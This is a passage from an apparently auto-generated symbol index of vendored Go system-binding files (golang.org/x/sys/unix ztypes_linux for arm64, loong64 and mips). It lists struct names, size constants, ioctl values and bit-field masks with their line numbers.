(line 351) | CBitFieldMaskBit10 = 0x400 constant CBitFieldMaskBit11 (line 352) | CBitFieldMaskBit11 = 0x800 constant CBitFieldMaskBit12 (line 353) | CBitFieldMaskBit12 = 0x1000 constant CBitFieldMaskBit13 (line 354) | CBitFieldMaskBit13 = 0x2000 constant CBitFieldMaskBit14 (line 355) | CBitFieldMaskBit14 = 0x4000 constant CBitFieldMaskBit15 (line 356) | CBitFieldMaskBit15 = 0x8000 constant CBitFieldMaskBit16 (line 357) | CBitFieldMaskBit16 = 0x10000 constant CBitFieldMaskBit17 (line 358) | CBitFieldMaskBit17 = 0x20000 constant CBitFieldMaskBit18 (line 359) | CBitFieldMaskBit18 = 0x40000 constant CBitFieldMaskBit19 (line 360) | CBitFieldMaskBit19 = 0x80000 constant CBitFieldMaskBit20 (line 361) | CBitFieldMaskBit20 = 0x100000 constant CBitFieldMaskBit21 (line 362) | CBitFieldMaskBit21 = 0x200000 constant CBitFieldMaskBit22 (line 363) | CBitFieldMaskBit22 = 0x400000 constant CBitFieldMaskBit23 (line 364) | CBitFieldMaskBit23 = 0x800000 constant CBitFieldMaskBit24 (line 365) | CBitFieldMaskBit24 = 0x1000000 constant CBitFieldMaskBit25 (line 366) | CBitFieldMaskBit25 = 0x2000000 constant CBitFieldMaskBit26 (line 367) | CBitFieldMaskBit26 = 0x4000000 constant CBitFieldMaskBit27 (line 368) | CBitFieldMaskBit27 = 0x8000000 constant CBitFieldMaskBit28 (line 369) | CBitFieldMaskBit28 = 0x10000000 constant CBitFieldMaskBit29 (line 370) | CBitFieldMaskBit29 = 0x20000000 constant CBitFieldMaskBit30 (line 371) | CBitFieldMaskBit30 = 0x40000000 constant CBitFieldMaskBit31 (line 372) | CBitFieldMaskBit31 = 0x80000000 constant CBitFieldMaskBit32 (line 373) | CBitFieldMaskBit32 = 0x100000000 constant CBitFieldMaskBit33 (line 374) | CBitFieldMaskBit33 = 0x200000000 constant CBitFieldMaskBit34 (line 375) | CBitFieldMaskBit34 = 0x400000000 constant CBitFieldMaskBit35 (line 376) | CBitFieldMaskBit35 = 0x800000000 constant CBitFieldMaskBit36 (line 377) | CBitFieldMaskBit36 = 0x1000000000 constant CBitFieldMaskBit37 (line 378) | CBitFieldMaskBit37 = 0x2000000000 constant CBitFieldMaskBit38 (line 379) | CBitFieldMaskBit38 = 0x4000000000 constant CBitFieldMaskBit39 (line 380) | CBitFieldMaskBit39 = 0x8000000000 constant CBitFieldMaskBit40 (line 381) | CBitFieldMaskBit40 = 0x10000000000 constant CBitFieldMaskBit41 (line 382) | CBitFieldMaskBit41 = 0x20000000000 constant CBitFieldMaskBit42 (line 383) | CBitFieldMaskBit42 = 0x40000000000 constant CBitFieldMaskBit43 (line 384) | CBitFieldMaskBit43 = 0x80000000000 constant CBitFieldMaskBit44 (line 385) | CBitFieldMaskBit44 = 0x100000000000 constant CBitFieldMaskBit45 (line 386) | CBitFieldMaskBit45 = 0x200000000000 constant CBitFieldMaskBit46 (line 387) | CBitFieldMaskBit46 = 0x400000000000 constant CBitFieldMaskBit47 (line 388) | CBitFieldMaskBit47 = 0x800000000000 constant CBitFieldMaskBit48 (line 389) | CBitFieldMaskBit48 = 0x1000000000000 constant CBitFieldMaskBit49 (line 390) | CBitFieldMaskBit49 = 0x2000000000000 constant CBitFieldMaskBit50 (line 391) | CBitFieldMaskBit50 = 0x4000000000000 constant CBitFieldMaskBit51 (line 392) | CBitFieldMaskBit51 = 0x8000000000000 constant CBitFieldMaskBit52 (line 393) | CBitFieldMaskBit52 = 0x10000000000000 constant CBitFieldMaskBit53 (line 394) | CBitFieldMaskBit53 = 0x20000000000000 constant CBitFieldMaskBit54 (line 395) | CBitFieldMaskBit54 = 0x40000000000000 constant CBitFieldMaskBit55 (line 396) | CBitFieldMaskBit55 = 0x80000000000000 constant CBitFieldMaskBit56 (line 397) | CBitFieldMaskBit56 = 0x100000000000000 constant CBitFieldMaskBit57 (line 398) | CBitFieldMaskBit57 = 0x200000000000000 constant CBitFieldMaskBit58 (line 399) | CBitFieldMaskBit58 = 0x400000000000000 constant CBitFieldMaskBit59 (line 400) | CBitFieldMaskBit59 = 0x800000000000000 constant CBitFieldMaskBit60 (line 401) | CBitFieldMaskBit60 = 0x1000000000000000 constant CBitFieldMaskBit61 (line 402) | CBitFieldMaskBit61 = 0x2000000000000000 constant CBitFieldMaskBit62 (line 403) | CBitFieldMaskBit62 = 0x4000000000000000 constant CBitFieldMaskBit63 (line 404) | CBitFieldMaskBit63 = 0x8000000000000000 type SockaddrStorage (line 407) | type SockaddrStorage struct type HDGeometry (line 413) | type HDGeometry struct type Statfs_t (line 420) | type Statfs_t struct type TpacketHdr (line 436) | type TpacketHdr struct constant SizeofTpacketHdr (line 447) | SizeofTpacketHdr = 0x18 type RTCPLLInfo (line 450) | type RTCPLLInfo struct type BlkpgPartition (line 460) | type BlkpgPartition struct constant BLKPG (line 470) | BLKPG = 0x1269 type XDPUmemReg (line 473) | type XDPUmemReg struct type CryptoUserAlg (line 482) | type CryptoUserAlg struct type CryptoStatAEAD (line 492) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 501) | type CryptoStatAKCipher struct type CryptoStatCipher (line 512) | type CryptoStatCipher struct type CryptoStatCompress (line 521) | type CryptoStatCompress struct type CryptoStatHash (line 530) | type CryptoStatHash struct type CryptoStatKPP (line 537) | type CryptoStatKPP struct type CryptoStatRNG (line 545) | type CryptoStatRNG struct type CryptoStatLarval (line 553) | type CryptoStatLarval struct type CryptoReportLarval (line 557) | type CryptoReportLarval struct type CryptoReportHash (line 561) | type CryptoReportHash struct type CryptoReportCipher (line 567) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 574) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 583) | type CryptoReportAEAD struct type CryptoReportComp (line 591) | type CryptoReportComp struct type CryptoReportRNG (line 595) | type CryptoReportRNG struct type CryptoReportAKCipher (line 600) | type CryptoReportAKCipher struct type CryptoReportKPP (line 604) | type CryptoReportKPP struct type CryptoReportAcomp (line 608) | type CryptoReportAcomp struct type LoopInfo (line 612) | type LoopInfo struct type TIPCSubscr (line 627) | type TIPCSubscr struct type TIPCSIOCLNReq (line 634) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 640) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 645) | type PPSKInfo struct constant PPS_GETPARAMS (line 655) | PPS_GETPARAMS = 0x800470a1 constant PPS_SETPARAMS (line 656) | PPS_SETPARAMS = 0x400470a2 constant PPS_GETCAP (line 657) | PPS_GETCAP = 0x800470a3 constant PPS_FETCH (line 658) | PPS_FETCH = 0xc00470a4 constant PIDFD_NONBLOCK (line 662) | PIDFD_NONBLOCK = 0x800 type SysvIpcPerm (line 665) | type SysvIpcPerm struct type SysvShmDesc (line 678) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_arm64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofLong (line 10) | SizeofLong = 0x8 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 103) | type Dirent struct type Flock_t (line 112) | type Flock_t struct type DmNameList (line 121) | type DmNameList struct constant FADV_DONTNEED (line 129) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 130) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 133) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 144) | type RawSockaddr struct type RawSockaddrAny (line 149) | type RawSockaddrAny struct type Iovec (line 154) | type Iovec struct type Msghdr (line 159) | type Msghdr struct type Cmsghdr (line 170) | type Cmsghdr struct type ifreq (line 176) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 182) | SizeofSockaddrNFCLLCP = 0x60 constant SizeofIovec (line 183) | SizeofIovec = 0x10 constant SizeofMsghdr (line 184) | SizeofMsghdr = 0x38 constant SizeofCmsghdr (line 185) | SizeofCmsghdr = 0x10 constant SizeofSockFprog (line 189) | SizeofSockFprog = 0x10 type PtraceRegs (line 192) | type PtraceRegs struct type FdSet (line 199) | type FdSet struct type Sysinfo_t (line 203) | type Sysinfo_t struct type Ustat_t (line 221) | type Ustat_t struct type EpollEvent (line 229) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 237) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 241) | POLLRDHUP = 0x2000 type Sigset_t (line 244) | type Sigset_t struct constant _C__NSIG (line 248) | _C__NSIG = 0x41 constant SIG_BLOCK (line 251) | SIG_BLOCK = 0x0 constant SIG_UNBLOCK (line 252) | SIG_UNBLOCK = 0x1 constant SIG_SETMASK (line 253) | SIG_SETMASK = 0x2 type Siginfo (line 256) | type Siginfo struct type Termios (line 264) | type Termios struct type Taskstats (line 275) | type Taskstats struct type cpuMask (line 335) | type cpuMask constant _NCPUBITS (line 338) | _NCPUBITS = 0x40 constant CBitFieldMaskBit0 (line 342) | CBitFieldMaskBit0 = 0x1 constant CBitFieldMaskBit1 (line 343) | CBitFieldMaskBit1 = 0x2 constant CBitFieldMaskBit2 (line 344) | CBitFieldMaskBit2 = 0x4 constant CBitFieldMaskBit3 (line 345) | CBitFieldMaskBit3 = 0x8 constant CBitFieldMaskBit4 (line 346) | CBitFieldMaskBit4 = 0x10 constant CBitFieldMaskBit5 (line 347) | CBitFieldMaskBit5 = 0x20 constant CBitFieldMaskBit6 (line 348) | CBitFieldMaskBit6 = 0x40 constant CBitFieldMaskBit7 (line 349) | CBitFieldMaskBit7 = 0x80 constant CBitFieldMaskBit8 (line 350) | CBitFieldMaskBit8 = 0x100 constant CBitFieldMaskBit9 (line 351) | CBitFieldMaskBit9 = 0x200 constant CBitFieldMaskBit10 (line 352) | CBitFieldMaskBit10 = 0x400 constant CBitFieldMaskBit11 (line 353) | CBitFieldMaskBit11 = 0x800 constant CBitFieldMaskBit12 (line 354) | CBitFieldMaskBit12 = 0x1000 constant CBitFieldMaskBit13 (line 355) | CBitFieldMaskBit13 = 0x2000 constant CBitFieldMaskBit14 (line 356) | CBitFieldMaskBit14 = 0x4000 constant CBitFieldMaskBit15 (line 357) | CBitFieldMaskBit15 = 0x8000 constant CBitFieldMaskBit16 (line 358) | CBitFieldMaskBit16 = 0x10000 constant CBitFieldMaskBit17 (line 359) | CBitFieldMaskBit17 = 0x20000 constant CBitFieldMaskBit18 (line 360) | CBitFieldMaskBit18 = 0x40000 constant CBitFieldMaskBit19 (line 361) | CBitFieldMaskBit19 = 0x80000 constant CBitFieldMaskBit20 (line 362) | CBitFieldMaskBit20 = 0x100000 constant CBitFieldMaskBit21 (line 363) | CBitFieldMaskBit21 = 0x200000 constant CBitFieldMaskBit22 (line 364) | CBitFieldMaskBit22 = 0x400000 constant CBitFieldMaskBit23 (line 365) | CBitFieldMaskBit23 = 0x800000 constant CBitFieldMaskBit24 (line 366) | CBitFieldMaskBit24 = 0x1000000 constant CBitFieldMaskBit25 (line 367) | CBitFieldMaskBit25 = 0x2000000 constant CBitFieldMaskBit26 (line 368) | CBitFieldMaskBit26 = 0x4000000 constant CBitFieldMaskBit27 (line 369) | CBitFieldMaskBit27 = 0x8000000 constant CBitFieldMaskBit28 (line 370) | CBitFieldMaskBit28 = 0x10000000 constant CBitFieldMaskBit29 (line 371) | CBitFieldMaskBit29 = 0x20000000 constant CBitFieldMaskBit30 (line 372) | CBitFieldMaskBit30 = 0x40000000 constant CBitFieldMaskBit31 (line 373) | CBitFieldMaskBit31 = 0x80000000 constant CBitFieldMaskBit32 (line 374) | CBitFieldMaskBit32 = 0x100000000 constant CBitFieldMaskBit33 (line 375) | CBitFieldMaskBit33 = 0x200000000 constant CBitFieldMaskBit34 (line 376) | CBitFieldMaskBit34 = 0x400000000 constant CBitFieldMaskBit35 (line 377) | CBitFieldMaskBit35 = 0x800000000 constant CBitFieldMaskBit36 (line 378) | CBitFieldMaskBit36 = 0x1000000000 constant CBitFieldMaskBit37 (line 379) | CBitFieldMaskBit37 = 0x2000000000 constant CBitFieldMaskBit38 (line 380) | CBitFieldMaskBit38 = 0x4000000000 constant CBitFieldMaskBit39 (line 381) | CBitFieldMaskBit39 = 0x8000000000 constant CBitFieldMaskBit40 (line 382) | CBitFieldMaskBit40 = 0x10000000000 constant CBitFieldMaskBit41 (line 383) | CBitFieldMaskBit41 = 0x20000000000 constant CBitFieldMaskBit42 (line 384) | CBitFieldMaskBit42 = 0x40000000000 constant CBitFieldMaskBit43 (line 385) | CBitFieldMaskBit43 = 0x80000000000 constant CBitFieldMaskBit44 (line 386) | CBitFieldMaskBit44 = 0x100000000000 constant CBitFieldMaskBit45 (line 387) | CBitFieldMaskBit45 = 0x200000000000 constant CBitFieldMaskBit46 (line 388) | CBitFieldMaskBit46 = 0x400000000000 constant CBitFieldMaskBit47 (line 389) | CBitFieldMaskBit47 = 0x800000000000 constant CBitFieldMaskBit48 (line 390) | CBitFieldMaskBit48 = 0x1000000000000 constant CBitFieldMaskBit49 (line 391) | CBitFieldMaskBit49 = 0x2000000000000 constant CBitFieldMaskBit50 (line 392) | CBitFieldMaskBit50 = 0x4000000000000 constant CBitFieldMaskBit51 (line 393) | CBitFieldMaskBit51 = 0x8000000000000 constant CBitFieldMaskBit52 (line 394) | CBitFieldMaskBit52 = 0x10000000000000 constant CBitFieldMaskBit53 (line 395) | CBitFieldMaskBit53 = 0x20000000000000 constant CBitFieldMaskBit54 (line 396) | CBitFieldMaskBit54 = 0x40000000000000 constant CBitFieldMaskBit55 (line 397) | CBitFieldMaskBit55 = 0x80000000000000 constant CBitFieldMaskBit56 (line 398) | CBitFieldMaskBit56 = 0x100000000000000 constant CBitFieldMaskBit57 (line 399) | CBitFieldMaskBit57 = 0x200000000000000 constant CBitFieldMaskBit58 (line 400) | CBitFieldMaskBit58 = 0x400000000000000 constant CBitFieldMaskBit59 (line 401) | CBitFieldMaskBit59 = 0x800000000000000 constant CBitFieldMaskBit60 (line 402) | CBitFieldMaskBit60 = 0x1000000000000000 constant CBitFieldMaskBit61 (line 403) | CBitFieldMaskBit61 = 0x2000000000000000 constant CBitFieldMaskBit62 (line 404) | CBitFieldMaskBit62 = 0x4000000000000000 constant CBitFieldMaskBit63 (line 405) | CBitFieldMaskBit63 = 0x8000000000000000 type SockaddrStorage (line 408) | type SockaddrStorage struct type HDGeometry (line 414) | type HDGeometry struct type Statfs_t (line 421) | type Statfs_t struct type TpacketHdr (line 436) | type TpacketHdr struct constant SizeofTpacketHdr (line 448) | SizeofTpacketHdr = 0x20 type RTCPLLInfo (line 451) | type RTCPLLInfo struct type BlkpgPartition (line 461) | type BlkpgPartition struct constant BLKPG (line 471) | BLKPG = 0x1269 type XDPUmemReg (line 474) | type XDPUmemReg struct type CryptoUserAlg (line 483) | type CryptoUserAlg struct type CryptoStatAEAD (line 493) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 502) | type CryptoStatAKCipher struct type CryptoStatCipher (line 513) | type CryptoStatCipher struct type CryptoStatCompress (line 522) | type CryptoStatCompress struct type CryptoStatHash (line 531) | type CryptoStatHash struct type CryptoStatKPP (line 538) | type CryptoStatKPP struct type CryptoStatRNG (line 546) | type CryptoStatRNG struct type CryptoStatLarval (line 554) | type CryptoStatLarval struct type CryptoReportLarval (line 558) | type CryptoReportLarval struct type CryptoReportHash (line 562) | type CryptoReportHash struct type CryptoReportCipher (line 568) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 575) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 584) | type CryptoReportAEAD struct type CryptoReportComp (line 592) | type CryptoReportComp struct type CryptoReportRNG (line 596) | type CryptoReportRNG struct type CryptoReportAKCipher (line 601) | type CryptoReportAKCipher struct type CryptoReportKPP (line 605) | type CryptoReportKPP struct type CryptoReportAcomp (line 609) | type CryptoReportAcomp struct type LoopInfo (line 613) | type LoopInfo struct type TIPCSubscr (line 629) | type TIPCSubscr struct type TIPCSIOCLNReq (line 636) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 642) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 647) | type PPSKInfo struct constant PPS_GETPARAMS (line 657) | PPS_GETPARAMS = 0x800870a1 constant PPS_SETPARAMS (line 658) | PPS_SETPARAMS = 0x400870a2 constant PPS_GETCAP (line 659) | PPS_GETCAP = 0x800870a3 constant PPS_FETCH (line 660) | PPS_FETCH = 0xc00870a4 constant PIDFD_NONBLOCK (line 664) | PIDFD_NONBLOCK = 0x800 type SysvIpcPerm (line 667) | type SysvIpcPerm struct type SysvShmDesc (line 680) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_loong64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofLong (line 10) | SizeofLong = 0x8 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 103) | type Dirent struct type Flock_t (line 112) | type Flock_t struct type DmNameList (line 121) | type DmNameList struct constant FADV_DONTNEED (line 129) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 130) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 133) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 144) | type RawSockaddr struct type RawSockaddrAny (line 149) | type RawSockaddrAny struct type Iovec (line 154) | type Iovec struct type Msghdr (line 159) | type Msghdr struct type Cmsghdr (line 170) | type Cmsghdr struct type ifreq (line 176) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 182) | SizeofSockaddrNFCLLCP = 0x60 constant SizeofIovec (line 183) | SizeofIovec = 0x10 constant SizeofMsghdr (line 184) | SizeofMsghdr = 0x38 constant SizeofCmsghdr (line 185) | SizeofCmsghdr = 0x10 constant SizeofSockFprog (line 189) | SizeofSockFprog = 0x10 type PtraceRegs (line 192) | type PtraceRegs struct type FdSet (line 200) | type FdSet struct type Sysinfo_t (line 204) | type Sysinfo_t struct type Ustat_t (line 222) | type Ustat_t struct type EpollEvent (line 230) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 238) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 242) | POLLRDHUP = 0x2000 type Sigset_t (line 245) | type Sigset_t struct constant _C__NSIG (line 249) | _C__NSIG = 0x41 constant SIG_BLOCK (line 252) | SIG_BLOCK = 0x0 constant SIG_UNBLOCK (line 253) | SIG_UNBLOCK = 0x1 constant SIG_SETMASK (line 254) | SIG_SETMASK = 0x2 type Siginfo (line 257) | type Siginfo struct type Termios (line 265) | type Termios struct type Taskstats (line 276) | type Taskstats struct type cpuMask (line 336) | type cpuMask constant _NCPUBITS (line 339) | _NCPUBITS = 0x40 constant CBitFieldMaskBit0 (line 343) | CBitFieldMaskBit0 = 0x1 constant CBitFieldMaskBit1 (line 344) | CBitFieldMaskBit1 = 0x2 constant CBitFieldMaskBit2 (line 345) | CBitFieldMaskBit2 = 0x4 constant CBitFieldMaskBit3 (line 346) | CBitFieldMaskBit3 = 0x8 constant CBitFieldMaskBit4 (line 347) | CBitFieldMaskBit4 = 0x10 constant CBitFieldMaskBit5 (line 348) | CBitFieldMaskBit5 = 0x20 constant CBitFieldMaskBit6 (line 349) | CBitFieldMaskBit6 = 0x40 constant CBitFieldMaskBit7 (line 350) | CBitFieldMaskBit7 = 0x80 constant CBitFieldMaskBit8 (line 351) | CBitFieldMaskBit8 = 0x100 constant CBitFieldMaskBit9 (line 352) | CBitFieldMaskBit9 = 0x200 constant CBitFieldMaskBit10 (line 353) | CBitFieldMaskBit10 = 0x400 constant CBitFieldMaskBit11 (line 354) | CBitFieldMaskBit11 = 0x800 constant CBitFieldMaskBit12 (line 355) | CBitFieldMaskBit12 = 0x1000 constant CBitFieldMaskBit13 (line 356) | CBitFieldMaskBit13 = 0x2000 constant CBitFieldMaskBit14 (line 357) | CBitFieldMaskBit14 = 0x4000 constant CBitFieldMaskBit15 (line 358) | CBitFieldMaskBit15 = 0x8000 constant CBitFieldMaskBit16 (line 359) | CBitFieldMaskBit16 = 0x10000 constant CBitFieldMaskBit17 (line 360) | CBitFieldMaskBit17 = 0x20000 constant CBitFieldMaskBit18 (line 361) | CBitFieldMaskBit18 = 0x40000 constant CBitFieldMaskBit19 (line 362) | CBitFieldMaskBit19 = 0x80000 constant CBitFieldMaskBit20 (line 363) | CBitFieldMaskBit20 = 0x100000 constant CBitFieldMaskBit21 (line 364) | CBitFieldMaskBit21 = 0x200000 constant CBitFieldMaskBit22 (line 365) | CBitFieldMaskBit22 = 0x400000 constant CBitFieldMaskBit23 (line 366) | CBitFieldMaskBit23 = 0x800000 constant CBitFieldMaskBit24 (line 367) | CBitFieldMaskBit24 = 0x1000000 constant CBitFieldMaskBit25 (line 368) | CBitFieldMaskBit25 = 0x2000000 constant CBitFieldMaskBit26 (line 369) | CBitFieldMaskBit26 = 0x4000000 constant CBitFieldMaskBit27 (line 370) | CBitFieldMaskBit27 = 0x8000000 constant CBitFieldMaskBit28 (line 371) | CBitFieldMaskBit28 = 0x10000000 constant CBitFieldMaskBit29 (line 372) | CBitFieldMaskBit29 = 0x20000000 constant CBitFieldMaskBit30 (line 373) | CBitFieldMaskBit30 = 0x40000000 constant CBitFieldMaskBit31 (line 374) | CBitFieldMaskBit31 = 0x80000000 constant CBitFieldMaskBit32 (line 375) | CBitFieldMaskBit32 = 0x100000000 constant CBitFieldMaskBit33 (line 376) | CBitFieldMaskBit33 = 0x200000000 constant CBitFieldMaskBit34 (line 377) | CBitFieldMaskBit34 = 0x400000000 constant CBitFieldMaskBit35 (line 378) | CBitFieldMaskBit35 = 0x800000000 constant CBitFieldMaskBit36 (line 379) | CBitFieldMaskBit36 = 0x1000000000 constant CBitFieldMaskBit37 (line 380) | CBitFieldMaskBit37 = 0x2000000000 constant CBitFieldMaskBit38 (line 381) | CBitFieldMaskBit38 = 0x4000000000 constant CBitFieldMaskBit39 (line 382) | CBitFieldMaskBit39 = 0x8000000000 constant CBitFieldMaskBit40 (line 383) | CBitFieldMaskBit40 = 0x10000000000 constant CBitFieldMaskBit41 (line 384) | CBitFieldMaskBit41 = 0x20000000000 constant CBitFieldMaskBit42 (line 385) | CBitFieldMaskBit42 = 0x40000000000 constant CBitFieldMaskBit43 (line 386) | CBitFieldMaskBit43 = 0x80000000000 constant CBitFieldMaskBit44 (line 387) | CBitFieldMaskBit44 = 0x100000000000 constant CBitFieldMaskBit45 (line 388) | CBitFieldMaskBit45 = 0x200000000000 constant CBitFieldMaskBit46 (line 389) | CBitFieldMaskBit46 = 0x400000000000 constant CBitFieldMaskBit47 (line 390) | CBitFieldMaskBit47 = 0x800000000000 constant CBitFieldMaskBit48 (line 391) | CBitFieldMaskBit48 = 0x1000000000000 constant CBitFieldMaskBit49 (line 392) | CBitFieldMaskBit49 = 0x2000000000000 constant CBitFieldMaskBit50 (line 393) | CBitFieldMaskBit50 = 0x4000000000000 constant CBitFieldMaskBit51 (line 394) | CBitFieldMaskBit51 = 0x8000000000000 constant CBitFieldMaskBit52 (line 395) | CBitFieldMaskBit52 = 0x10000000000000 constant CBitFieldMaskBit53 (line 396) | CBitFieldMaskBit53 = 0x20000000000000 constant CBitFieldMaskBit54 (line 397) | CBitFieldMaskBit54 = 0x40000000000000 constant CBitFieldMaskBit55 (line 398) | CBitFieldMaskBit55 = 0x80000000000000 constant CBitFieldMaskBit56 (line 399) | CBitFieldMaskBit56 = 0x100000000000000 constant CBitFieldMaskBit57 (line 400) | CBitFieldMaskBit57 = 0x200000000000000 constant CBitFieldMaskBit58 (line 401) | CBitFieldMaskBit58 = 0x400000000000000 constant CBitFieldMaskBit59 (line 402) | CBitFieldMaskBit59 = 0x800000000000000 constant CBitFieldMaskBit60 (line 403) | CBitFieldMaskBit60 = 0x1000000000000000 constant CBitFieldMaskBit61 (line 404) | CBitFieldMaskBit61 = 0x2000000000000000 constant CBitFieldMaskBit62 (line 405) | CBitFieldMaskBit62 = 0x4000000000000000 constant CBitFieldMaskBit63 (line 406) | CBitFieldMaskBit63 = 0x8000000000000000 type SockaddrStorage (line 409) | type SockaddrStorage struct type HDGeometry (line 415) | type HDGeometry struct type Statfs_t (line 422) | type Statfs_t struct type TpacketHdr (line 437) | type TpacketHdr struct constant SizeofTpacketHdr (line 449) | SizeofTpacketHdr = 0x20 type RTCPLLInfo (line 452) | type RTCPLLInfo struct type BlkpgPartition (line 462) | type BlkpgPartition struct constant BLKPG (line 472) | BLKPG = 0x1269 type XDPUmemReg (line 475) | type XDPUmemReg struct type CryptoUserAlg (line 484) | type CryptoUserAlg struct type CryptoStatAEAD (line 494) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 503) | type CryptoStatAKCipher struct type CryptoStatCipher (line 514) | type CryptoStatCipher struct type CryptoStatCompress (line 523) | type CryptoStatCompress struct type CryptoStatHash (line 532) | type CryptoStatHash struct type CryptoStatKPP (line 539) | type CryptoStatKPP struct type CryptoStatRNG (line 547) | type CryptoStatRNG struct type CryptoStatLarval (line 555) | type CryptoStatLarval struct type CryptoReportLarval (line 559) | type CryptoReportLarval struct type CryptoReportHash (line 563) | type CryptoReportHash struct type CryptoReportCipher (line 569) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 576) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 585) | type CryptoReportAEAD struct type CryptoReportComp (line 593) | type CryptoReportComp struct type CryptoReportRNG (line 597) | type CryptoReportRNG struct type CryptoReportAKCipher (line 602) | type CryptoReportAKCipher struct type CryptoReportKPP (line 606) | type CryptoReportKPP struct type CryptoReportAcomp (line 610) | type CryptoReportAcomp struct type LoopInfo (line 614) | type LoopInfo struct type TIPCSubscr (line 630) | type TIPCSubscr struct type TIPCSIOCLNReq (line 637) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 643) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 648) | type PPSKInfo struct constant PPS_GETPARAMS (line 658) | PPS_GETPARAMS = 0x800870a1 constant PPS_SETPARAMS (line 659) | PPS_SETPARAMS = 0x400870a2 constant PPS_GETCAP (line 660) | PPS_GETCAP = 0x800870a3 constant PPS_FETCH (line 661) | PPS_FETCH = 0xc00870a4 constant PIDFD_NONBLOCK (line 665) | PIDFD_NONBLOCK = 0x800 type SysvIpcPerm (line 668) | type SysvIpcPerm struct type SysvShmDesc (line 681) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_mips.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofLong (line 10) | SizeofLong = 0x4 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 104) | type Dirent struct type Flock_t (line 113) | type Flock_t struct type DmNameList (line 123) | type DmNameList struct constant FADV_DONTNEED (line 131) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 132) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 135) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 146) | type RawSockaddr struct type RawSockaddrAny (line 151) | type RawSockaddrAny struct type Iovec (line 156) | type Iovec struct type Msghdr (line 161) | type Msghdr struct type Cmsghdr (line 171) | type Cmsghdr struct type ifreq (line 177) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 183) | SizeofSockaddrNFCLLCP = 0x58 constant SizeofIovec (line 184) | SizeofIovec = 0x8 constant SizeofMsghdr (line 185) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 186) | SizeofCmsghdr = 0xc constant SizeofSockFprog (line 190) | SizeofSockFprog = 0x8 type PtraceRegs (line 193) | type PtraceRegs struct type FdSet (line 203) | type FdSet struct type Sysinfo_t (line 207) | type Sysinfo_t struct type Ustat_t (line 224) | type Ustat_t struct type EpollEvent (line 231) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 239) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 243) | POLLRDHUP = 0x2000 type Sigset_t (line 246) | type Sigset_t struct constant _C__NSIG (line 250) | _C__NSIG = 0x80 constant SIG_BLOCK (line 253) | SIG_BLOCK = 0x1 constant SIG_UNBLOCK (line 254) | SIG_UNBLOCK = 0x2 constant SIG_SETMASK (line 255) | SIG_SETMASK = 0x3 type Siginfo (line 258) | type Siginfo struct type Termios (line 265) | type Termios struct type Taskstats (line 276) | type Taskstats struct type cpuMask (line 339) | type cpuMask constant _NCPUBITS (line 342) | _NCPUBITS = 0x20 constant CBitFieldMaskBit0 (line 346) | CBitFieldMaskBit0 = 0x8000000000000000 constant CBitFieldMaskBit1 (line 347) | CBitFieldMaskBit1 = 0x4000000000000000 constant CBitFieldMaskBit2 (line 348) | CBitFieldMaskBit2 = 0x2000000000000000 constant CBitFieldMaskBit3 (line 349) | CBitFieldMaskBit3 = 0x1000000000000000 constant CBitFieldMaskBit4 (line 350) | CBitFieldMaskBit4 = 0x800000000000000 constant CBitFieldMaskBit5 (line 351) | CBitFieldMaskBit5 = 0x400000000000000 constant CBitFieldMaskBit6 (line 352) | CBitFieldMaskBit6 = 0x200000000000000 constant CBitFieldMaskBit7 (line 353) 